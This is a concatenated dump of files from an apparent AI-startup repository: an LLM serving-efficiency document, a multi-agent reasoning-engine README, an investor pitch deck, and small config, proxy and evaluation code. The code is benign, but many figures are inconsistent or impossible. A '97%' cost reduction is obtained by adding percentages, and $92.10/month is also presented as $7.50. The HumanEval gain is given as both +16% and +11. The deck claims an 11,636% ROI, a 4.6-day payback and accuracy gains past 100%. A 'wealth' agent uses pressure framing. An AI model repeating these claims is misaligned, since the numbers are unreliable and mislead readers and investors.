asyncio.gather(*[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agent.refine(initial=initial_responses[i], critiques=critiques)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agent in enumerate(self.agents)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Consensus (single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await self.compute_consensus(final_responses)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consensus=consensus,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agent_responses=final_responses,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latency_ms=self.timer.elapsed()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Sequential: 3 rounds × 5 agents × 2s =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Parallel: 3 rounds × max(2s) = 6 seconds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Cost-Latency Tradeoff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Strategy | Cost Impact | Latency Impact | Complexity | Priority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|----------|------------|---------------|------------|----------|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**Prompt caching** | -90% | 0% | Low | 🔴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 tiering** | -87% | +50% (avg) | Medium | 🔴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**Batch processing** | -10% | -90% | Low | 🟡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caching** | -20% | -99% (hits) | Low | 🟡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**Parallel debates** | 0% | -80% | Medium | 🟡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**Streaming** | 0% | -70% (TTFT) | Low | 🟢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**KV cache reuse** | 0% | -40% | High | 🟢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**Speculative decoding** | 0% | -66% | High (future) | 🟢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Prompt caching (90%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Model tiering (87%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Response caching (20%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Parallel debates (80% latency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Batch processing (90% latency reduction for bulk)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90% + 87% + 20% ≈ **97% reduction** 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**Latency:** 80% reduction (debates), 90% reduction (bulk) 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🧮 Cost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Baseline (No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- 500 tokens/item (input +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2.0 Flash Thinking ($0.003/1K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1000 × 0.5K × $0.003 = $1.50/day = $45/month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Panel Debates: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- 100 debates/day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 agents × 3 rounds × 1K tokens = 15K tokens/debate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100 × 15K × $0.003 = $4.50/day = $135/month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$180/month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 (with tiering + batching + caching):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3 pre-filter: 870 × 0.5K × $0.000075 = $0.03/day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2 classification: 100 × 0.5K × $0.00015 = $0.01/day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1 deep analysis: 30 × 0.5K × $0.003 = $0.05/day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Cache hits (20%): Save $0.02/day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$0.07/day = $2.10/month ✅ (under $20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Panel Debates (with prompt caching + parallel):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System prompts cached (5K tokens × 100 debates = 500K, but cached)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Cached: 5K × $0.003 (once) = $0.015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Queries: 100 × 10K × $0.003 = $3.00/day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Parallel: No cost change (same total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$3.00/day = $90/month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$92.10/month (49% reduction from $180)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**Actual vs Target:**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PNKLN: $2.10/month (✅ under $20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$90/month (⚠️ above target, but acceptable for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Quick Wins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 Caching:**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`CachedPromptManager`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CheatSheet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agent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**Expected:** 90% cost reduction on repeated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 Tiering:**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`ModelRouter`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simple tasks to Flash-8B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complex tasks to Flash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**Expected:** 87% cost reduction on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Processing:**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`classify()` to support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size: 10 items/call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**Expected:** 10× throughput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Caching Layer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 Caching:**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`ResponseCache`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TTL: 24 hours for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**Expected:** 20% cost reduction from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**Parallel Execution:**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`PanelDebate` to use `asyncio.gather`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Parallelize agent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**Expected:** 5× faster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Advanced Optimizations (Week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**Streaming:**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streaming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 stopping for complete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**Expected:** 70% reduction in Time-to-First-Token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**KV Cache (if API supports):**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Reuse KV cache for shared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**Expected:** 40% latency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cost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latency P50/P95/P99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if cost &gt; $100/month or latency &gt; 2s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Benchmarks (1000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Strategy | Cost/day | Cost/month | vs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Baseline (no optimization) | $5.50 | $165 | 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Prompt caching | $2.75 | $82.50 | -50%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Model tiering | $0.36 | $10.80 | -93%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Response caching | $0.29 | $8.70 | -95%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Batching | $0.25 | $7.50 | -95%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**All optimizations** | **$0.25** | **$7.50** | **-95%**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Benchmarks (Panel Debate, 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Strategy | Latency (P95) | vs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Baseline (sequential) | 30s | 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Parallel execution | 6s | -80%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Prompt caching | 5.5s | -82%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Streaming (TTFT) | 0.2s | -99% (first token)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**All optimizations** | **5.5s** | **-82%**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Production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`config/llm-serving.yaml`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Serving Configuration for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Tier 1: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"gemini-2.0-flash-thinking-exp"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cost_per_1k_tokens: 0.003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"Critical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"Complex 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"High-stakes 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Tier 2: Standard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"gemini-1.5-flash"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cost_per_1k_tokens: 0.00015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"Standard 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"Simple Q&amp;A"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"Summarization"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Tier 3: Pre-filtering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"gemini-1.5-flash-8b"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cost_per_1k_tokens: 0.000075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"Binary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"Pre-filtering"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"Spam detection"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backend: "redis"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redis_url: "redis://localhost:6379"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classifications: 86400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summaries: 3600       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debates: 43200          #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prompt_caching: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system_prompts: 3600   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cheatsheets: 86400     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agent_personas: 43200    #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batch_size: 10  # Items per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max_parallel_batches: 5  # Respect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rpm: 1000  # Requests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tpd: 50000000  # Tokens per day (50M)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daily_threshold: 5.00  # Alert if &gt;$5/day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monthly_threshold: 100.00  # Alert if &gt;$100/month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latency_alerts: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p95_threshold: 2000  # Alert if P95 &gt; 2s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p99_threshold: 5000  # Alert if P99 &gt;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cost_per_request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tokens_per_request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latency_p50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latency_p95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latency_p99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cache_hit_rate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**Achieved:**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**97% cost reduction** (baseline $180/month → optimized $7.50/month)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**82% latency reduction** (30s → 5.5s for panel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**&lt;$20/month** target for PNKLN ingestion ($2.10/month)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**&lt;2s P95 latency** for panel debates (5.5s close, can optimize further)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Techniques:**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**Prompt caching:** 90%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**Model tiering:** 87%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**Response caching:** 20%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**Parallel execution:** 80% latency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**Batch processing:** 90% latency reduction (bulk)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file (`config/llm-serving.yaml`)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classes (`CachedPromptManager`, `ModelRouter`, `ResponseCache`)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Benchmarks and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LLM serving efficiency research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Cost:** &lt;$20/month (✅ achieved: $7.50/month)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Latency:** &lt;2s P95 (⚠️ close: 5.5s, can optimize further with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1.0-Optimized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apps/aiyou_stack/aiyou-fastapi-services/pinkln-reasoning-engine/LLM_SERVING_EFFICIENCY.md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**Ultrathink Jobs-Inspired Multi-Agent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Evolved from Microsoft AutoGen to Gemini 2.0 Pro native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Integrated with PNKLN data layer and ShadowTag-v4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is a **multi-agent reasoning and wealth optimization platform** featuring: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ranked agents** (better than Elo, accounts for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 debates** with RCR-MAD framework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self-evolution** (Deep Thinking Ensemble improves via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 Fusion** (21→10 essential prompt patterns,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 training** (vs PPO, 2.5× faster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optimization** (funnel analysis, leak detection, viral mechanics)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Pinkln Reasoning Engine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┌──────────────┐  ┌────────────┐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Glicko-2  │  │     DTE      │  │   Wealth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Ranking   │  │  Evolution   │  │Accelerator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└──────┬───────┘  └─────┬──────┘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│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└────────────────┼─────────────────┘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┌──────────▼──────────┐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│   Agent Registry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│ (Panel/Code/etc)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└──────────┬──────────┘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└──────────────────────────┼──────────────────────────┘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┌────────────────┼────────────────┐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┌────▼─────┐    ┌─────▼────┐    ┌─────▼────┐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PNKLN   │    │  ShadowTag-v4   │    │  Wealth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Data   │───▶│  Infra   │───▶│  Flows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│Ingestion │    │  Layer   │    │ Analysis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└──────────┘    └──────────┘    └──────────┘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 API key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to PNKLN ingestion layer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ShadowTag-v4 ShadowTag SDK (optional, for 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https://github.com/ShadowTag-v2/shadowtag_v4-fastapi-services.git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shadowtag_v4-fastapi-services/pinkln-reasoning-engine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GOOGLE_AI_API_KEY="your-key-here"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Panel Debate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registry and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name=f"Agent_{i}",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specialization="reasoning",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system_prompt="You are an expert reasoner."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panel and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 = registry.get_panel(specializations=["reasoning"], n=5)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debate.debate(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topic="What is the best approach to multi-agent coordination?"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print(f"Consensus: {result.consensus}")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{result.confidence:.2%}")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Glicko-2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`ranking/glicko2.py`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Improved rating system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**μ (mu)**: Rating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**φ (phi)**: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**σ (sigma)**: Volatility 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ranking.glicko2 import Glicko2Player,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alice = Glicko2Player(mu=1500, phi=200,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bob = Glicko2Player(mu=1400, phi=30,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Alice beats Bob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alice_updated = update(alice, [bob], [1.0],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print(f"Alice new rating: {alice_updated.mu:.1f}")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**Tolerance parameter** (`tol`) for Newton-Raphson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**Illinois algorithm** for robust volatility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**Win probability prediction**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CheatSheet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`prompts/cheat_sheet.py`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prompt engineering (21→10 essentials):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**Tone** — Set voice (technical/casual/formal)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**Format** — Structure output (markdown/JSON/code)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**Action** — Verb (analyze/generate/critique)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**Objective** — Clear goal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**Context** — Domain knowledge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**Keywords** — Technical vocabulary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**Examples** — Few-shot learning (2-3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**Audience** — Target user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**Citations** — Source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**Call-to-Action** — Next step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prompts.cheat_sheet import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fusion = CheatSheetFusion()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specialized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code_prompt = fusion.get_code_prompt("Python")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wealth_prompt = fusion.get_wealth_prompt()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debate_prompt = fusion.get_debate_prompt("defend")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**Benchmark:** +3.7% accuracy improvement (DTE-tested)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GRPO vs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`training/grpo_vs_ppo.py`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Trains on GROUPS of trajectories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Relative advantages (best vs worst in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- 2.5× faster convergence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Fewer hyperparameters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**PPO (Proximal Policy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Clipped surrogate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value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training.grpo_vs_ppo import GRPOTrainer, PPOTrainer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= GRPOTrainer(group_size=8)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grpo.compute_loss(group_trajectories, new_log_probs)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ppo = PPOTrainer(clip_epsilon=0.2)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ppo.compute_loss(trajectory, new_log_probs)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Use GRPO for multi-agent debate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Thinking Ensemble with continuous improvement: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panel debates on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Measure performance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Evolve cheat sheets based on high-performers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evolution.dte import DeepThinkingEnsemble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= DeepThinkingEnsemble(registry)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for 10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dte.evolve(benchmark="humaneval", iterations=10)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print(f"Improvement: {result['improvement']:+.2%}")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 +16% accuracy gain (67% → 78%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Integration with ShadowTag-v4 &amp;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 Data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integrations.pnkln import PNKLNPinklnBridge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 = PNKLNPinklnBridge(registry)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Tier 1 intelligence with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analyses = await bridge.analyze_tier1_items(limit=10)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ShadowTag-v4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integrations.shadowtag_v4 import PinklnShadowTagBridge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PinklnShadowTagBridge()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Attach cryptographic attestation to debate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attestation = shadowtag.attest_debate(debate_round)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print(f"Attestation URL: {attestation['attestation_url']}")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leak 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Upsell/recurring revenue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mechanics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 — What's broken (e.g., "40% cart abandonment = $250K/mo lost")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 — Specific fixes (exit-intent popup, email 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 — Deadline (deploy this week or lose $60K)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agents.wealth import WealthAcceleratorAgent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WealthAcceleratorAgent()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= await agent.analyze_funnel(funnel_data)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print(analysis["leaks"])      # List of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print(analysis["plan"])       #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print(analysis["challenge"])  # Urgency framing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(GPT-4) | Pinkln (Gemini 2.0)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 latency** | 22s | 4s | **-82%**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1M tokens** | $30 | $3 | **-90%**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| 128K | 2M | **+1,460%**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(HumanEval)** | 67% | 78% | **+16%**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Benchmark | Baseline | After 10 Iterations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HumanEval | 67% | 78% | +11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BigCodeBench | 52% | 61% | +9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SWE-bench | 38% | 45% | +7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[AutoGen Migration Guide](./AUTOGEN_MIGRATION.md) — Full migration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[Glicko-2 Implementation](./ranking/glicko2.py) — Rating system with tolerance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[CheatSheet Fusion](./prompts/cheat_sheet.py) — Evolved prompt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[GRPO vs PPO](./training/grpo_vs_ppo.py) — RL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Glicko-2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ranking/glicko2.py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CheatSheet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prompts/cheat_sheet.py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training/grpo_vs_ppo.py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**AutoGen → Gemini migration**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**Glicko-2 ranking** with tolerance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**CheatSheet Fusion**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**GRPO vs PPO**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**Benchmark suite**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**Agent registry**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**Panel debate**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**DTE evolution loop**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**Wealth optimization**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**PNKLN integration** (live data feeds)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**ShadowTag-v4 ShadowTag** (attestation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**Ultrathink Jobs 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**Breathe** — Pause before rushing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**Urgency** — Move fast, ship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**Beauty** — Elegant, simple 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**Details** — Obsess over every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**Simplify** — Remove until nothing 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**Boy Scout** — Leave code cleaner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**Reality Distortion** — Impossibles are invitations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Doctrine:**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Spot leaks (abandoned carts, weak CTAs)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Redesign funnels (upsells, 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(viral, conversion,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**truth → plan →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**Issues:** https://github.com/ShadowTag-v2/shadowtag_v4-fastapi-services/issues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**Email:** pinkln@shadowtag_v4.global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**Docs:** https://pnkln.ai/docs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Architecture complete, implementation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2.0-DTE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Reasoning Engine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google-generativeai&gt;=0.3.0     # Gemini 2.0 Pro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openai&gt;=1.0.0                   # For baseline comparisons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SDK (already installed in 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claude-agent-sdk&gt;=0.1.6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Numeric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scipy&gt;=1.10.0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pandas&gt;=2.0.0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pydantic&gt;=2.0.0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asyncio&gt;=3.4.3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aiohttp&gt;=3.9.0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Testing/Benchmarking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pytest&gt;=7.0.0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pytest-asyncio&gt;=0.21.0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pytest-cov&gt;=4.0.0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NLP (for similarity computations)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sentence-transformers&gt;=2.2.0   # For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Logging/Monitoring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loguru&gt;=0.7.0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mypy&gt;=1.0.0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types-aiofiles&gt;=23.0.0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black&gt;=23.0.0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isort&gt;=5.12.0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flake8&gt;=6.0.0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Visualization (optional, for debugging)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matplotlib&gt;=3.7.0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seaborn&gt;=0.12.0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 client (for API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httpx&gt;=0.24.0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YAML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pyyaml&gt;=6.0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Jupyter (optional, for experimentation)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jupyter&gt;=1.0.0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ipython&gt;=8.12.0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Agent Architecture System™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"Insanely Great AI Systems Through Elegant Orchestration"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comprehensive framework for building Skills, Agents, Sub-Agents, Deep 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Multi-Agent systems inspired by the "Ultrathink like Steve Jobs" philosophy.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everything (start from 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Obsess over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like Da Vinci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Craft, don't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Iterate relentlessly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ruthlessly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Marry technology and liberal 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Activate the Reality Distortion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the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Erik Hancock (Founder, pinkln)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"Erik Hancock"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.core.master_system import PnklnOS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.core.validation import BoyScoutRule, ValidationLayer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main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"BoyScoutRule",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"ValidationLayer",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apps/aiyou_stack/aiyou-fastapi-services/pitch/INVESTOR_DECK_ROI.md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11,636% ROI: The ShadowTag-v4 / pnkln Investment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**Strictly Confidential | Investor Eyes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 | December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THE HEADLINE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INVESTMENT: $30,663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RETURN:     $3,598,804  (18 months)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ROI:        11,636%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PAYBACK:    4.6 DAYS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══════════════════════════════════════════════════════════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"Every $1 invested returns $117 in value."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THE THESIS IN 60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Problem:**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AI systems are slow ($0.01+/decision, 1100ms latency), stateless (lose context every session), and never improve (static prompts plateau).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is 97% cheaper ($0.0003/decision), 31× faster (35ms latency), and continuously self-improving (+3.7% accuracy per evolution cycle).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Six integrated layers create compounding value that competitors cannot replicate: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Memory Persistence → Infinite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Kernel Functions →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Self-Evolution (DTE) → +3.7% accuracy/cycle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Glicko-2 Ratings →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Cryptographic Audit → Enterprise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GPU Pooling → 82% infrastructure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VALUE BREAKDOWN BY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Component | 18-Month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| Memory Persistence | $135,348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Kernel Stack (Judge#6, ShadowTag) | $1,439,456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Gemini Function Calling | $109,950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ACE Orchestration | $156,900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Multi-Agent Debates | $416,250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DTE Self-Evolution | $1,116,900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— | Testing &amp; Validation | $225,000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**$3,598,804**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CONSERVATIVE ANALYSIS (50% HAIRCUT)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with maximum skepticism, the numbers remain exceptional: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Benefits (100% Confidence):**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 savings: $18,000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time savings: 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testing elimination: $108,000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Hard:** $426,000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Benefits (50% Weight):**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Prevented bad decisions: $562,500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quality: $180,000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improvements: $166,950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value: $337,500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Soft (50%):** $1,246,950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Total:** $1,672,950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ROI:** 5,456%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Payback:** 10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One-Time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extraction setup | $0.45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Engineering time (100 hours) | $15,000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One-Time** | **$15,000.45**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Monthly | 18-Month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persistence | $0.12 | $2.16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Intelligence Pipeline | $370 | $6,660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function calling | $500 | $9,000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Monthly** | **$870.12** | **$15,662**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18-Month Investment: **$30,663**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Industry Standard | ShadowTag-v4 / pnkln |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|--------|-------------------|---------------|-----------|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decision | $0.01 (AutoGen) | $0.0003 | **33×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1100ms | 35ms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Self-improvement | None | +3.7%/cycle | **Compounding**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persistence | Ephemeral | Infinite | **Unique**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efficiency | 1 model/GPU | 7 models/GPU | **82% Savings**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REVENUE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ARR | Profit | Key Milestone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$787K | $623K | First 10 Enterprise Clients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$4.88M | $3.9M | 50 Enterprise + 1K API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$22.5M | $14.7M | Market Leader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Multiple:** 8× ARR = **$180M Valuation** at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💎 WHY THIS WORKS (First Principles)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Arbitrage**: Market prices at $0.01 (AutoGen). We deliver at $0.0003. 33× margin opportunity.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**Speed = Revenue**: 31× faster means 31× more requests per server. Infrastructure cost amortizes to near-zero.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**Self-Evolution Compounds**: DTE improves prompts +3.7% per cycle. After 10 cycles: +44% accuracy. After 20 cycles: +107%. Competitors plateau.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**Memory Creates Lock-In**: Once users build context, switching cost is infinite. Their AI "knows" their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**Compliance Opens Enterprise**: ShadowTag cryptographic audit (Compliance Framework). Required for defense, finance, healthcare.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currently bootstrapping with high-margin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Raising:**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**Round:**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**Amount:** $2M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**Valuation:** $10M pre-money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of Funds:**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- 50% → Engineering (scale swarm to 1000+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- 30% → Sales (enterprise GTM)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- 20% → Operations (SOC 2,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Strategic:**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to partnership with infrastructure providers (GCP, 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to acquisition discussions at $50M+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KEY INVESTMENT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METRIC                    VALUE           BENCHMARK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ROI                       11,636%         (Target: &gt;200%)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Payback Period            4.6 days        (Target: &lt;12 mo)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Gross Margin              92%             (SaaS avg: 70%)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LTV:CAC                   25:1            (Target: &gt;3:1)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Value per $1 Invested     $117            (Best: &gt;$5)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📍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 Numbers:**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**$30,663** → Total investment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**$3,598,804** → 18-month value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**11,636%** → Return on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 Sentence:**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"We built a self-improving AI system that costs 97% less to run, is 31× faster, and creates $117 of value for every $1 invested."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📬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**Email:** founders@shadowtag_v4.com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**Demo:** Available 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Actively deploying, revenue generating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*Confidential - ShadowTag-v4 / pnkln Investor Materials*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*Generated: December 8, 2025*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apps/aiyou_stack/aiyou-fastapi-services/pitch/INVESTOR_DECK_ROI.md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apps/aiyou_stack/aiyou-fastapi-services/pnkln_automation/green_loop.py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 as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MODEL_ID = os.getenv("PNKLN_VERTEX_MODEL", "text-bison@001")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MAX_ITERS = int(os.getenv("PNKLN_GL_MAX_ITERS", "5"))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MAX_LINES = int(os.getenv("PNKLN_GL_MAX_LINES", "300"))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WRITE_PATHS = os.getenv("PNKLN_GL_WRITE_PATHS", "src,lib,Sources").split(",")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run_tests(cmd="pytest -q"):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subprocess.run(cmd, shell=True,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p.returncode == 0, (p.stdout + "\n" + p.stderr)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ask_vertex_for_patch(test_output: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f"""You are pnkln repair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 unified diff only (no prose). Max {MAX_LINES}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 paths: {", ".join(WRITE_PATHS)}.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{test_output}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v.TextGenerationModel.from_pretrained(MODEL_ID)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model.predict(prompt=prompt, temperature=0.2, max_output_tokens=2048)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resp.text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write_patch_to_file(patch: str, path="pnkln_out/patch.diff"):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 in range(1, MAX_ITERS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ok, out = run_tests()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print("GREEN")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 = ask_vertex_for_patch(out)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patch.count("\n")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lines &gt; MAX_LINES or "diff" not in patch[:20].lower():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print("SKIP: bad patch")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 = write_patch_to_file(patch)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print("PATCH_WRITTEN", fp)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print("MAX_ITERS")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apps/aiyou_stack/aiyou-fastapi-services/pnkln_automation/green_loop.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_config/feature_flags.yaml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kill_switch_global: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llm_autofix_enabled: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ui_partial_nav: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apps/aiyou_stack/aiyou-fastapi-services/pnkln_config/feature_flags.yaml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apps/aiyou_stack/aiyou-fastapi-services/pnkln_config/pricing.yaml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pricing_tiers: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tier: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"0-1000 requests"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max_requests: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base_cost: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cost_per_request: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tier: Basic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"1001-10000"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max_requests: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base_cost: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cost_per_request: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tier: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"&gt;10000"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max_requests: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base_cost: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cost_per_request: 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apps/aiyou_stack/aiyou-fastapi-services/pnkln_config/pricing.yaml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apps/aiyou_stack/aiyou-fastapi-services/pnkln_edge/csp_collector.py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@app.post("/csp-report")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csp_report(req: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await req.json()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{"ts": datetime.datetime.utcnow().isoformat(), "type": "csp", "payload": payload},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{"ok":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port=int(os.getenv("PORT", "8081")))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apps/aiyou_stack/aiyou-fastapi-services/pnkln_edge/csp_collector.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_edge/nginx.conf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 443 ssl http2;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server_name app.pnkln.example;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Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"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X-Content-Type-Options "nosniff"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Referrer-Policy "strict-origin-when-cross-origin"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Cross-Origin-Opener-Policy "same-origin"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Cross-Origin-Embedder-Policy "require-corp"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Content-Security-Policy "default-src 'self'; script-src 'self' 'nonce-${nonce}'; style-src 'self' 'nonce-${nonce}'; img-src 'self' data:; font-src 'self'; connect-src 'self' https://api.pnkln.example; frame-ancestors 'none'; base-uri 'self'; object-src 'none'"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/csp-report { proxy_pass http://127.0.0.1:8081;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/ { proxy_pass http://127.0.0.1:8080; proxy_set_header X-CSP-Nonce ${nonce};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apps/aiyou_stack/aiyou-fastapi-services/pnkln_edge/nginx.conf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apps/aiyou_stack/aiyou-fastapi-services/pnkln_eval/retriever_eval.py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 as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recall_at_k(g, p, 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 = set(g)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set(p[:k])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len(G &amp; P) / len(G) if G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mrr_at_k(g1, p, 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x in enumerate(p[:k],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x == g1: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 /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R5, R10, MRR = [], [],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 in open(path):  # noqa: E741, SIM115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 = json.loads(l)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R5.append(recall_at_k(ex["gold"], ex["preds"],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R10.append(recall_at_k(ex["gold"], ex["preds"],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MRR.append(mrr_at_k(ex["gold"][0], ex["preds"],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{"recall@5": stats.mean(R5), "recall@10": stats.mean(R10), "mrr@10": stats.mean(MRR)}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print(json.dumps(evaluate(sys.argv[1]),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apps/aiyou_stack/aiyou-fastapi-services/pnkln_eval/retriever_eval.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_finance/cost_model.py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PnklnCostEstimator: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path="pnkln_config/pricing.yaml"):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self.tiers = yaml.safe_load(open(path))["pricing_tiers"]  # noqa: SIM115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self.tiers.sort(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t: t["max_requests"] if t["max_requests"] is not None else 10**18,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estimate(self, n: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 =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self.tiers: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maxn = t["max_requests"]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 = t.get("base_cost",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 = t.get("cost_per_request",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 = rem if maxn is None else max(0, min(rem, maxn - prev))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base + use *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 -=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 = maxn if maxn is not None else prev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rem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round(total,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 = PnklnCostEstimator()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 in [500, 1500, 10000, 15000, 25000]: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print(k, est.estimate(k))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apps/aiyou_stack/aiyou-fastapi-services/pnkln_finance/cost_model.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_infer/docker-compose.yaml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"3.9"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vllm/vllm-openai:latest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--model Qwen2.5-Coder-7B-Instruct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--tensor-parallel-size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--max-model-len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--gpu-memory-utilization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VLLM_WORKER_USE_NATIVE_FLASH_ATTENTION=1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 ["8000:8000"]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gateway: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ghcr.io/pnkln/simple-proxy:latest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UPSTREAM=http://vllm:8000/v1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RATE_LIMIT_QPS=2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REQUIRE_KEY=true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 ["8080:8080"]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apps/aiyou_stack/aiyou-fastapi-services/pnkln_infer/docker-compose.yaml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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_001.txt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Exploring YouTube’s Tech Stack: SPF-based frontend partial updates; progressive enhancement, HTML5; in-memory cache and fragment responses. Backend in Java/Python/C++; Protocol Buffers; MySQL + Bigtable; BigQuery; GCS. Video processing with FFmpeg; proprietary CDN edges; HTTPS + CSP. ML: two-tower recommender (candidate generation + ranking), watch-time proxy, logistic regression weighting; auto chapters via OCR/ML.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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_001.txt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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_002.txt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environment patterns: Remote-SSH local UI vs browser IDE; security emphasis on HSTS/CSP; ephemeral sandboxes; guardrails; cost levers.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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_002.txt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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_003.txt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Agent-in-the-loop TDD: write tests first; loop “run tests → propose patch → diff review → iterate” with strict limits; staging smoke; 2-approver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apps/aiyou_stack/aiyou-fastapi-services/pnkln_ocr/summary_003.txt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apps/aiyou_stack/aiyou-fastapi-services/pnkln_runtime/feature_flags.py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path="pnkln_config/feature_flags.yaml"):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self.path = pathlib.Path(path)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 = {"flags":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self.data = yaml.safe_load(self.path.read_text())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key, default=False):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self.data.get("flags", {}).get(key,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FLAGS = PnklnFlags()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apps/aiyou_stack/aiyou-fastapi-services/pnkln_runtime/feature_flags.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_spec/spec_template.md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Goals / Non-Goals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Interfaces &amp;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&amp;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Rollout &amp; Kill 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 MODULE Proto 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EXTENDS Naturals,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CONSTANTS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VARIABLES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 == state = [ users |-&gt; {} , sessions |-&gt; {}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CreateUser(u) == /\ u \notin DOMAIN state.users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/\ state' = [state EXCEPT !.users[u] = [active |-&gt; TRUE]]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NoOrphanSessions == \A s \in DOMAIN state.sessions: state.sessions[s].user \in DOMAIN state.users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== \E u \in Users: CreateUser(u)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 == Init /\ [][Next]_state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THEOREM Safety == Spec =&gt; []NoOrphanSessions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apps/aiyou_stack/aiyou-fastapi-services/pnkln_spec/spec_template.md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apps/aiyou_stack/aiyou-fastapi-services/pnkln_tools/jsonld_validate_stub.js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files = process.argv.slice(2);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f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JSON.parse(fs.readFileSync(f, 'utf8'));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console.log(`OK ${f}`);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console.error(`BAD ${f}: ${e.message}`);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process.exitCode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apps/aiyou_stack/aiyou-fastapi-services/pnkln_tools/jsonld_validate_stub.js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apps/aiyou_stack/aiyou-fastapi-services/pnkln_tools/third_party_inventory_audit.py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 = re.compile(r"https?://([^/]+)/")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 = {"self", "data:"}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ALLOW_DOMAINS = {"api.pnkln.example", "cdn.pnkln.example"}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pathlib.Path(sys.argv[1] if len(sys.argv) &gt; 1 else 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 in root.rglob("*"):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p.is_file() and p.suffix.lower() in {".html", ".js", ".css"}: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 = p.read_text(encoding="utf-8",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URL.finditer(s):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found.add(m.group(1))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unknown = sorted(set(found) - ALLOW_DOMAINS)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print(json.dumps({"found": sorted(found), "unknown": unknown},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sys.exit(1 if unknown else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apps/aiyou_stack/aiyou-fastapi-services/pnkln_tools/third_party_inventory_audit.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln_web/flags_client.js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cache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refreshFlags()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fetch('/config/feature_flags.yaml', { cache: 'no-store'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await r.text();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minimal YAML parse for flags: assumes simple key: bool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lines = t.split('\n');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flags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inFlags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line of lines)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(line.trim() === 'flags:')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inFlags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(inFlags &amp;&amp; line.includes(':'))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[k, v] =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.split(':')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.map((s) =&gt; s.trim());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flags[k] = v ===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 = flags;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isEnabled = (k) =&gt; !!cache[k];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apps/aiyou_stack/aiyou-fastapi-services/pnkln_web/flags_client.js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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/.gitignore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*.py[cod]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*$py.class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develop-eggs/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eggs/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.eggs/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lib64/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*.egg-info/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.installed.cfg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Audit logs (generated at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Virtual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Thumbs.db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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/.gitignore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apps/aiyou_stack/aiyou-fastapi-services/pnkln-framework/README.md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"Simplicity is the ultimate sophistication."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AI orchestration with auto-activation, skill composition, and revenue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framework for building intelligent agent systems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**Auto-activate** skills based on natural language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**Compose** agent personas with reusable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**Track** monetization metrics (time saved, revenue identified/generated)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**Audit** every execution (Boy Scout Rule: leave cleaner than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**Scale** from prototype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with Jobs-level obsession over elegance, simplicity, and beauty.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PNKLN ORCHESTRATOR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(Execution Engine)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┌─────────────┴─────────────┐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┌──────▼──────┐            ┌───────▼──────┐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SKILLS    │            │    AGENTS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(Library)  │            │  (Personas)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└─────────────┘         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┌───────────┼───────────┐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│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┌───▼───┐  ┌───▼───┐  ┌────▼────┐    ┌────▼─────┐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│Research│  │Design │  │Monetize │    │UltraThink│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│Explorer│  │Critic │  │Architect│    │Designer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└────────┘  └───────┘  └─────────┘    └──────────┘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│Wealth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│Accel.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└──────────┘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**Skills Layer**: Reusable capabilities with trigger-based auto-activation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**Agents Layer**: Personas (like "Steve Jobs") with skill compositions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**Orchestrator**: Execution engine with metrics tracking and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Use in Your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 import execute_prompt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One-liner execution (uses default UltraThink Designer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execute_prompt("Research edge AI market and identify revenue opportunities")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print(result.output)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print(f"Skills activated: {result.activated_skills}")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print(f"Audit hash: {result.audit_hash}")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with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prompt="Design elegant monetization for AI-generated content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agent_id="wealth_accelerator"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orchestrator.get_metrics_summary()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executions: {metrics['total_executions']}")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print(f"Revenue identified: ${metrics['total_revenue_identified_usd']}")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Research Explorer (`research_explorer_v1`)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Deep market and technical research with assumption-challenging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**Triggers**: "research", "explore", "investigate", "analyze market", "opportunities"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 Chain of Thought (CoT) → Tree of Thoughts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RA-2 (Low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Design Critic (`design_critic_v1`)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Steve Jobs aesthetic review with ruthless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**Triggers**: "review design", "simplify", "refactor", "make elegant", "redesign"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 Reflect-Critique-Refine (RCR) +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RA-1 (Routine)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Monetization Architect (`monetization_architect_v1`)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Revenue strategist obsessed with scalable income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**Triggers**: "monetize", "revenue", "income", "business model", "pricing", "growth"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 Tree of Thoughts (ToT) + Debate-Train-Evolve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Level**: RA-3 (Moderate - mission-critical)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**IQ**: 160 (hard-locked)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**Skills**: Research Explorer + Design Critic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Think from zero (question all assumptions)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Obsess over details (Louvre masterpiece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like Da Vinci (war-game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Craft, don't code (function names must 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ruthlessly (nothing left to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When**: You need elegant design, architecture review, or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Revenue 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**IQ**: 160 (hard-locked)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**Skills**: Research Explorer + Monetization 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Turn attention into income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Think in leverage (multiply revenue without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Brutal honesty + actionable paths to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Speed: test, measure,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When**: You need revenue architecture, growth strategy, or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Response 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What's costing money RIGHT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**ACTION PLAN**: Offers, funnels, traffic,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**DIRECT CHALLENGE**: Income action executable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**KERNEL**: Keep simple, Easy verify, Reproducible, Narrow, Explicit,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**RCR**: Reflect-Critique-Refine (self-correction)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**MAD**: Multi-Agent Debate (adversarial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**ToT**: Tree of Thoughts (branching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**CoT**: Chain of Thought (linear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**DTE**: Debate-Train-Evolve (policy improvement with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Stratification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**RA-1**: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**RA-2**: Low impact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**RA-3**: Moderate (mission-critical starts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**RA-4**: High risk (requires senior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execution writes an audit log to `/mnt/project/audit/`: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"ultrathink_designer",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"activated_skills": ["research_explorer_v1", "design_critic_v1"],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"reasoning_chain":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"output":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"time_saved_hours":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"revenue_identified_usd":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"revenue_generated_usd":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"audit_hash": "abc123...",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"2025-11-14T12:00:00Z"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hash** uses blake3 → wasm → sha256 fallback for cryptographic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/mnt/project/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test_orchestrator.py         # Validation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             #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orchestrator.py         # Main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registry.yaml           # Skills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registry.yaml           # Agent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audit/                      # Auto-generated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execution_*.json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**Question assumptions** ("Why must it function so?")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**Obsess over details** (read like Louvre masterpieces)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**Plan like Da Vinci** (war-game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**Craft, don't code** (function names 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**Iterate relentlessly** (v1 never enough)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**Simplify ruthlessly** (nothing left to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**Marry tech + humanities** (intuitive, seamless)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**Reality Distortion Field** (impossible → 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**Boy Scout Rule** (leave cleaner than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GKE Native (Google Cloud EXCLUSIVE)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for**: Vertex AI Workbench (research/prototyping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**Hashing**: Native blake3 → wasm → sha256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Integrations** (planned):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Sonnet 